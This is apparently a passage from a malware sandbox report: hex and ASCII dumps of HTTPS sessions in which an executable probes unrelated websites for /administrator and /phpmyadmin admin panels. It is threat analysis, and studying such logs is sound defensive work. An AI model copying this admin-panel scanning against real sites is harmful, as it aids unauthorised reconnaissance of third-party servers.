                                                                                                                                                                                                    2023-11-26 05:59:33 UTC206INData Raw: 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    124192.168.2.45757215.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC229OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://unaj.edu.pe/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC15911INData Raw: 37 39 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7973<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC15193INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    125192.168.2.457563104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC333OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: site_version_phase=108; site_version=HDv3
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.hugedomains.com/domain_profile.cfm?d=robinsonland.com
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC637INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 41 53 50 2e 4e 45 54 0d 0a 6c 62 3a 20 54 63 6c 50 72 64 4c 62 48 64 33 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: privatevary: Accept-Encodingx-powered-by: ASP.NETlb: TclPrdLbHd3CF-Cache-Status: DYNAMICR
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC732INData Raw: 31 65 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65
                                                                                                                                                                                                    Data Ascii: 1e7a<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 68 64 2d 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 32 2d 31 30 2d 33 33 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65
                                                                                                                                                                                                    Data Ascii: 3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/hd-style.css?aa=2022-10-33"><meta name="the
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 29 3b 20 2a 2f 0d 0a 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 2c 20 7b 0d 0a 27 63 75 73 74 6f 6d 5f 6d 61 70 27 3a 20 7b 0d 0a 27 64 69 6d 65 6e 73 69 6f 6e 33
                                                                                                                                                                                                    Data Ascii: js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gtag('config', 'UA-7117339-4'); */gtag('config', 'UA-7117339-4', {'custom_map': {'dimension3
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f 72 6d 53 65 61 72 63 68 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 64 6f 6d 61 69 6e 5f 6e 61 6d 65 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 69 6e 70 75 74 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 54 65 78 74 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d
                                                                                                                                                                                                    Data Ascii: hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFormSearchID"><input type="text" name="domain_name" value class="search-input" id="hdv3HeaderSearchTextID" aria-label=
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 4d 65 6e 75 20 64 2d 66 6c 65 78 20 61 69 2d 63 65 6e 74 65 72 20 6a 63 2d 62 65 74 77 65 65 6e 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 6e 61 76 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61
                                                                                                                                                                                                    Data Ascii: </div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overlay "><div class="overlayMenu d-flex ai-center jc-between"><ul class="navbar-nav"><li class="nav-item"><a class="na
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 6e 75 6d 62 65 72 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 69 64 3d 22 68 64 76 33 43 61 72 74 4e 75 6d 62 65 72 53 70 61 6e 49 44 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 61 76 3e 0a 3c 2f 68 65 61
                                                                                                                                                                                                    Data Ascii: label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt><span class="cart-number hiddenAtLoad" id="hdv3CartNumberSpanID"></span></a></div></div></div></div></nav></hea
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC233INData Raw: 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6f 72 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></div><div class="circularJ_8"></div></div></button><span class="or">or</span>
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 37 66 66 61 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 50 50 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 50 50 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 50 50 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 22
                                                                                                                                                                                                    Data Ascii: 7ffa<a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=RobinsonLand.com" class="btn m-t-0 " id="hdv3Billboard197PPID" onClick="$('#hdv3Billboard197PPID').addClass('hiddenAtLoad'); $('#hdv3Billboard197PPProceID').removeClass('hiddenAtLoad');"
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 65 73 2f 68 64 76 33 2d 69 6d 67 2f 72 6f 6b 65 74 2d 73 69 64 65 2d 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 54 61 6b 65 20 69 6d 6d 65 64 69 61 74 65 20 6f 77 6e 65 72 73 68 69 70 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 73 61 66 65 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e
                                                                                                                                                                                                    Data Ascii: es/hdv3-img/roket-side-ico.png" alt></div><div class="content"><span>Take immediate ownership</span></div></li><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/safesmallico.png" alt></div><div class="content"><span>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    126192.168.2.45769976.223.105.2304436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC207OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: saudi-jamac.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: dps_site_id=us-east-1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC288INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 34 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 44 50 53 2f 32 2e 30 2e 30 2b 73 68 61 2d 33 32 31 30 62 34 39 0d 0a 58 2d 56 65 72 73 69 6f 6e 3a 20 33 32 31 30 62 34 39 0d 0a 58 2d 53 69 74 65 49 64 3a 20 75 73 2d 65 61 73 74 2d 31 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 70 73 5f 73 69 74 65 5f 69 64 3d 75 73 2d 65 61 73 74 2d 31 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-3210b49X-Version: 3210b49X-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sun, 26 Nov 2023 05
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC964INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    127192.168.2.457721172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC632INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 70 68 70 6d 79 61 64 6d 69 6e 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/phpmyadminCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC422INData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
